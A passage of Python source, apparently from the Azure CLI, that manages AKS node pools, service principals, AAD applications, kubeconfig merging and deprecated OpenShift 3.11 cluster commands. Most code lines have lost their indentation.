if update_cluster_autoscaler:
if not instance.enable_auto_scaling:
raise CLIError('Autoscaler is not enabled for this node pool.\n'
'Run "az aks nodepool update --enable-cluster-autoscaler" '
'to enable cluster with min-count and max-count.')
instance.min_count = int(min_count)
instance.max_count = int(max_count)
if not instance.upgrade_settings:
instance.upgrade_settings = AgentPoolUpgradeSettings()
if max_surge:
instance.upgrade_settings.max_surge = max_surge
if disable_cluster_autoscaler:
if not instance.enable_auto_scaling:
logger.warning('Autoscaler is already disabled for this node pool.')
return None
instance.enable_auto_scaling = False
instance.min_count = None
instance.max_count = None
instance.tags = tags
if mode is not None:
instance.mode = mode
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_delete(cmd, client, resource_group_name, cluster_name,
nodepool_name,
no_wait=False):
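    """Delete a node pool, after verifying (case-insensitively) that it exists in the cluster."""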
agentpool_exists = False
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name.lower() == nodepool_name.lower():
agentpool_exists = True
break
if not agentpool_exists:
raise CLIError("Node pool {} doesnt exist, "
"use 'aks nodepool list' to get current node pool list".format(nodepool_name))
return sdk_no_wait(no_wait, client.delete, resource_group_name, cluster_name, nodepool_name)
def aks_agentpool_get_upgrade_profile(cmd, client, resource_group_name, cluster_name, nodepool_name):
return client.get_upgrade_profile(resource_group_name, cluster_name, nodepool_name)
def _ensure_aks_acr_role_assignment(cli_ctx,
client_id,
registry_id,
detach=False):
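    """Create the 'acrpull' role assignment for client_id scoped to the registry,
    or delete it when detach=True.
    """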
if detach:
if not _delete_role_assignments(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not delete role assignments for ACR. '
'Are you an Owner on this subscription?')
return
if not _add_role_assignment(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not create a role assignment for ACR. '
'Are you an Owner on this subscription?')
return
def _ensure_aks_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
location=None,
name=None):
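    """Return the service principal, client secret and AAD session key to use,
    creating a new service principal (and secret) when none is supplied.
    """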
aad_session_key = None
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, make one.
if not client_secret:
client_secret = _create_client_secret()
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
url = 'https://{}.{}.{}.cloudapp.azure.com'.format(salt, dns_name_prefix, location)
service_principal, aad_session_key = _build_service_principal(rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
# We don't need to add role assignment for this created SPN
else:
        # --service-principal specified, validate --client-secret was too
if not client_secret:
raise CLIError('--client-secret is required if --service-principal is specified')
return {
'client_secret': client_secret,
'service_principal': service_principal,
'aad_session_key': aad_session_key,
}
def _ensure_osa_aad(cli_ctx,
aad_client_app_id=None,
aad_client_app_secret=None,
aad_tenant_id=None,
identifier=None,
name=None, create=False,
customer_admin_group_id=None):
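    """Create or update the AAD application used by an OSA cluster (when create=True)
    and return the corresponding OpenShiftManagedClusterAADIdentityProvider. The tenant
    ID is taken from the current profile when not supplied.
    """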
rbac_client = get_graph_rbac_management_client(cli_ctx)
if create:
        # This reply_url is set temporarily because Azure needs one to create the AAD application.
app_id_name = 'https://{}'.format(name)
if not aad_client_app_secret:
aad_client_app_secret = _create_client_secret()
# Delegate Sign In and Read User Profile permissions on Windows Azure Active Directory API
resource_access = ResourceAccess(id="311a71cc-e848-46a1-bdf8-97ff7156d8e6",
additional_properties=None, type="Scope")
# Read directory permissions on Windows Azure Active Directory API
directory_access = ResourceAccess(id="5778995a-e1bf-45b8-affa-663a9f3f4d04",
additional_properties=None, type="Role")
required_osa_aad_access = RequiredResourceAccess(resource_access=[resource_access, directory_access],
additional_properties=None,
resource_app_id="00000002-0000-0000-c000-000000000000")
list_aad_filtered = list(rbac_client.applications.list(filter="identifierUris/any(s:s eq '{}')"
.format(app_id_name)))
if list_aad_filtered:
aad_client_app_id = list_aad_filtered[0].app_id
# Updating reply_url with the correct FQDN information returned by the RP
reply_url = 'https://{}/oauth2callback/Azure%20AD'.format(identifier)
update_application(client=rbac_client.applications,
object_id=list_aad_filtered[0].object_id,
display_name=name,
identifier_uris=[app_id_name],
reply_urls=[reply_url],
homepage=app_id_name,
password=aad_client_app_secret,
required_resource_accesses=[required_osa_aad_access])
logger.info('Updated AAD: %s', aad_client_app_id)
else:
result, _aad_session_key = create_application(client=rbac_client.applications,
display_name=name,
identifier_uris=[app_id_name],
homepage=app_id_name,
password=aad_client_app_secret,
required_resource_accesses=[required_osa_aad_access])
aad_client_app_id = result.app_id
logger.info('Created an AAD: %s', aad_client_app_id)
# Get the TenantID
if aad_tenant_id is None:
profile = Profile(cli_ctx=cli_ctx)
_, _, aad_tenant_id = profile.get_login_credentials()
return OpenShiftManagedClusterAADIdentityProvider(
client_id=aad_client_app_id,
secret=aad_client_app_secret,
tenant_id=aad_tenant_id,
kind='AADIdentityProvider',
customer_admin_group_id=customer_admin_group_id)
def _ensure_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
location=None,
name=None):
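    """Return the service principal and client secret to use, creating a new service
    principal with the Contributor role when none is supplied.
    """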
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, make one.
if not client_secret:
client_secret = _create_client_secret()
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
url = 'https://{}.{}.{}.cloudapp.azure.com'.format(salt, dns_name_prefix, location)
service_principal, _aad_session_key = _build_service_principal(rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
        # Add the Contributor role assignment before returning the newly created service principal
if not _add_role_assignment(cli_ctx, 'Contributor', service_principal):
logger.warning('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
else:
        # --service-principal specified, validate --client-secret was too
if not client_secret:
raise CLIError('--client-secret is required if --service-principal is specified')
return {
'client_secret': client_secret,
'service_principal': service_principal,
}
def _create_client_secret():
# Add a special character to satisfy AAD SP secret requirements
special_char = '$'
client_secret = binascii.b2a_hex(os.urandom(10)).decode('utf-8') + special_char
return client_secret
def _get_rg_location(ctx, resource_group_name, subscription_id=None):
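    """Return the location of the given resource group, raising if it does not exist."""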
groups = cf_resource_groups(ctx, subscription_id=subscription_id)
    # The get call errors out if the resource group doesn't exist; we only need its location.
rg = groups.get(resource_group_name)
return rg.location
def _check_cluster_autoscaler_flag(enable_cluster_autoscaler,
min_count,
max_count,
node_count,
agent_pool_profile):
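    """Validate min-count, max-count and node-count and enable autoscaling on the agent
    pool profile when --enable-cluster-autoscaler is set; reject min/max counts otherwise.
    """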
if enable_cluster_autoscaler:
if min_count is None or max_count is None:
            raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler is enabled')
if int(min_count) > int(max_count):
raise CLIError('Value of min-count should be less than or equal to value of max-count')
if int(node_count) < int(min_count) or int(node_count) > int(max_count):
raise CLIError('node-count is not in the range of min-count and max-count')
agent_pool_profile.min_count = int(min_count)
agent_pool_profile.max_count = int(max_count)
agent_pool_profile.enable_auto_scaling = True
else:
if min_count is not None or max_count is not None:
            raise CLIError('min-count and max-count can only be used together with --enable-cluster-autoscaler')
def _validate_autoscaler_update_counts(min_count, max_count, is_enable_or_update):
"""
    Validate min-count and max-count when enabling or updating the cluster autoscaler
"""
if min_count is None or max_count is None:
if is_enable_or_update:
raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler or '
'--update-cluster-autoscaler is set.')
if min_count is not None and max_count is not None:
if int(min_count) > int(max_count):
raise CLIError('Value of min-count should be less than or equal to value of max-count.')
def _print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name):
"""Merge an unencrypted kubeconfig into the file at the specified path, or print it to
stdout if the path is "-".
"""
# Special case for printing to stdout
if path == "-":
print(kubeconfig)
return
# ensure that at least an empty ~/.kube/config exists
directory = os.path.dirname(path)
if directory and not os.path.exists(directory):
try:
os.makedirs(directory)
except OSError as ex:
if ex.errno != errno.EEXIST:
raise
if not os.path.exists(path):
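        # Create an empty kubeconfig readable and writable only by the owner (0o600).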
with os.fdopen(os.open(path, os.O_CREAT | os.O_WRONLY, 0o600), 'wt'):
pass
# merge the new kubeconfig into the existing one
fd, temp_path = tempfile.mkstemp()
additional_file = os.fdopen(fd, 'w+t')
try:
additional_file.write(kubeconfig)
additional_file.flush()
merge_kubernetes_configurations(path, temp_path, overwrite_existing, context_name)
except yaml.YAMLError as ex:
logger.warning('Failed to merge credentials to kube config file: %s', ex)
finally:
additional_file.close()
os.remove(temp_path)
def _remove_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
    This works around a quirk of the Python SDK's behavior: these fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags']
ap_attrs = ['os_disk_size_gb', 'vnet_subnet_id']
sp_attrs = ['secret']
for managed_cluster in managed_clusters:
for attr in attrs:
if getattr(managed_cluster, attr, None) is None:
delattr(managed_cluster, attr)
if managed_cluster.agent_pool_profiles is not None:
for ap_profile in managed_cluster.agent_pool_profiles:
for attr in ap_attrs:
if getattr(ap_profile, attr, None) is None:
delattr(ap_profile, attr)
for attr in sp_attrs:
if getattr(managed_cluster.service_principal_profile, attr, None) is None:
delattr(managed_cluster.service_principal_profile, attr)
return managed_clusters
def _remove_osa_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of OpenShift ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
    This works around a quirk of the Python SDK's behavior: these fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags', 'plan', 'type', 'id']
ap_master_attrs = ['name', 'os_type']
net_attrs = ['peer_vnet_id']
for managed_cluster in managed_clusters:
for attr in attrs:
if hasattr(managed_cluster, attr) and getattr(managed_cluster, attr) is None:
delattr(managed_cluster, attr)
for attr in ap_master_attrs:
if getattr(managed_cluster.master_pool_profile, attr, None) is None:
delattr(managed_cluster.master_pool_profile, attr)
for attr in net_attrs:
if getattr(managed_cluster.network_profile, attr, None) is None:
delattr(managed_cluster.network_profile, attr)
return managed_clusters
def _validate_aci_location(norm_location):
"""
Validate the Azure Container Instance location
"""
aci_locations = [
"australiaeast",
"canadacentral",
"centralindia",
"centralus",
"eastasia",
"eastus",
"eastus2",
"eastus2euap",
"japaneast",
"northcentralus",
"northeurope",
"southcentralus",
"southeastasia",
"southindia",
"uksouth",
"westcentralus",
"westus",
"westus2",
"westeurope"
]
if norm_location not in aci_locations:
raise CLIError('Azure Container Instance is not available at location "{}".'.format(norm_location) +
' The available locations are "{}"'.format(','.join(aci_locations)))
def osa_list(cmd, client, resource_group_name=None):
if resource_group_name:
managed_clusters = client.list_by_resource_group(resource_group_name)
else:
managed_clusters = client.list()
return _remove_osa_nulls(list(managed_clusters))
def _format_workspace_id(workspace_id):
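    """Normalize a Log Analytics workspace resource ID: ensure a leading '/' and strip any trailing '/'."""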
workspace_id = workspace_id.strip()
if not workspace_id.startswith('/'):
workspace_id = '/' + workspace_id
if workspace_id.endswith('/'):
workspace_id = workspace_id.rstrip('/')
return workspace_id
def openshift_create(cmd, client, resource_group_name, name, # pylint: disable=too-many-locals
location=None,
compute_vm_size="Standard_D4s_v3",
compute_count=3,
aad_client_app_id=None,
aad_client_app_secret=None,
aad_tenant_id=None,
vnet_prefix="10.0.0.0/8",
subnet_prefix="10.0.0.0/24",
vnet_peer=None,
tags=None,
no_wait=False,
workspace_id=None,
customer_admin_group_id=None):
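    """Create an OpenShift 3.11 (OSA) managed cluster, creating or reusing the required
    AAD application and optionally enabling monitoring with a Log Analytics workspace.
    """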
logger.warning('Support for the creation of ARO 3.11 clusters ends 30 Nov 2020. Please see aka.ms/aro/4 for information on switching to ARO 4.') # pylint: disable=line-too-long
if location is None:
location = _get_rg_location(cmd.cli_ctx, resource_group_name)
agent_pool_profiles = []
agent_node_pool_profile = OpenShiftManagedClusterAgentPoolProfile(
name='compute', # Must be 12 chars or less before ACS RP adds to it
count=int(compute_count),
vm_size=compute_vm_size,
os_type="Linux",
role=OpenShiftAgentPoolProfileRole.compute,
subnet_cidr=subnet_prefix
)
agent_infra_pool_profile = OpenShiftManagedClusterAgentPoolProfile(
name='infra', # Must be 12 chars or less before ACS RP adds to it
count=int(3),
vm_size="Standard_D4s_v3",
os_type="Linux",
role=OpenShiftAgentPoolProfileRole.infra,
subnet_cidr=subnet_prefix
)
agent_pool_profiles.append(agent_node_pool_profile)
agent_pool_profiles.append(agent_infra_pool_profile)
agent_master_pool_profile = OpenShiftManagedClusterAgentPoolProfile(
name='master', # Must be 12 chars or less before ACS RP adds to it
count=int(3),
vm_size="Standard_D4s_v3",
os_type="Linux",
subnet_cidr=subnet_prefix
)
identity_providers = []
create_aad = False
    # Check that the cluster does not already exist, since AAD rotation on OSA is not supported for now
try:
client.get(resource_group_name, name)
except CloudError:
        # Create a new AAD app only when none of aad_client_app_id, aad_client_app_secret and aad_tenant_id is set
if aad_client_app_id is None and aad_client_app_secret is None and aad_tenant_id is None:
create_aad = True
osa_aad_identity = _ensure_osa_aad(cmd.cli_ctx,
aad_client_app_id=aad_client_app_id,
aad_client_app_secret=aad_client_app_secret,
aad_tenant_id=aad_tenant_id, identifier=None,
name=name, create=create_aad,
customer_admin_group_id=customer_admin_group_id)
identity_providers.append(
OpenShiftManagedClusterIdentityProvider(
name='Azure AD',
provider=osa_aad_identity
)
)
auth_profile = OpenShiftManagedClusterAuthProfile(identity_providers=identity_providers)
default_router_profile = OpenShiftRouterProfile(name='default')
if vnet_peer is not None:
from msrestazure.tools import is_valid_resource_id, resource_id
if not is_valid_resource_id(vnet_peer):
vnet_peer = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Network', type='virtualNetwork',
name=vnet_peer
)
if workspace_id is not None:
workspace_id = _format_workspace_id(workspace_id)
monitor_profile = OpenShiftManagedClusterMonitorProfile(enabled=True, workspace_resource_id=workspace_id) # pylint: disable=line-too-long
else:
monitor_profile = None
network_profile = NetworkProfile(vnet_cidr=vnet_prefix, peer_vnet_id=vnet_peer)
osamc = OpenShiftManagedCluster(
location=location, tags=tags,
open_shift_version="v3.11",
network_profile=network_profile,
auth_profile=auth_profile,
agent_pool_profiles=agent_pool_profiles,
master_pool_profile=agent_master_pool_profile,
router_profiles=[default_router_profile],
monitor_profile=monitor_profile)
try:
# long_running_operation_timeout=300
result = sdk_no_wait(no_wait, client.create_or_update,
resource_group_name=resource_group_name, resource_name=name, parameters=osamc)
result = LongRunningOperation(cmd.cli_ctx)(result)
instance = client.get(resource_group_name, name)
_ensure_osa_aad(cmd.cli_ctx,
aad_client_app_id=osa_aad_identity.client_id,
aad_client_app_secret=osa_aad_identity.secret,
aad_tenant_id=osa_aad_identity.tenant_id, identifier=instance.public_hostname,
name=name, create=create_aad)
except CloudError as ex:
if "The resource type could not be found in the namespace 'Microsoft.ContainerService" in ex.message:
raise CLIError('Please make sure your subscription is whitelisted to use this service. https://aka.ms/openshift/managed') # pylint: disable=line-too-long
if "No registered resource provider found for location" in ex.message:
raise CLIError('Please make sure your subscription is whitelisted to use this service. https://aka.ms/openshift/managed') # pylint: disable=line-too-long
raise ex
def openshift_show(cmd, client, resource_group_name, name):
logger.warning('The az openshift command is deprecated and has been replaced by az aro for ARO 4 clusters. See http://aka.ms/aro/4 for information on switching to ARO 4.') # pylint: disable=line-too-long
mc = client.get(resource_group_name, name)
return _remove_osa_nulls([mc])[0]
def openshift_scale(cmd, client, resource_group_name, name, compute_count, no_wait=False):
logger.warning('The az openshift command is deprecated and has been replaced by az aro for ARO 4 clusters. See http://aka.ms/aro/4 for information on switching to ARO 4.') # pylint: disable=line-too-long
instance = client.get(resource_group_name, name)
# TODO: change this approach when we support multiple agent pools.
idx = 0
for i in range(len(instance.agent_pool_profiles)):
if instance.agent_pool_profiles[i].name.lower() == "compute":
idx = i
break
instance.agent_pool_profiles[idx].count = int(compute_count) # pylint: disable=no-member
    # Null out the AAD profile and manually set the master pool profile name, because validation complains otherwise
instance.master_pool_profile.name = "master"
instance.auth_profile = None
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def openshift_monitor_enable(cmd, client, resource_group_name, name, workspace_id, no_wait=False):
logger.warning('The az openshift command is deprecated and has been replaced by az aro for ARO 4 clusters. See http://aka.ms/aro/4 for information on switching to ARO 4.') # pylint: disable=line-too-long
instance = client.get(resource_group_name, name)
workspace_id = _format_workspace_id(workspace_id)
monitor_profile = OpenShiftManagedClusterMonitorProfile(enabled=True, workspace_resource_id=workspace_id) # pylint: disable=line-too-long
instance.monitor_profile = monitor_profile
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)
def openshift_monitor_disable(cmd, client, resource_group_name, name, no_wait=False):
logger.warning('The az openshift command is deprecated and has been replaced by az aro for ARO 4 clusters. See http://aka.ms/aro/4 for information on switching to ARO 4.') # pylint: disable=line-too-long
instance = client.get(resource_group_name, name)
monitor_profile = OpenShiftManagedClusterMonitorProfile(enabled=False, workspace_resource_id=None) # pylint: disable=line-too-long
instance.monitor_profile = monitor_profile
return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, name, instance)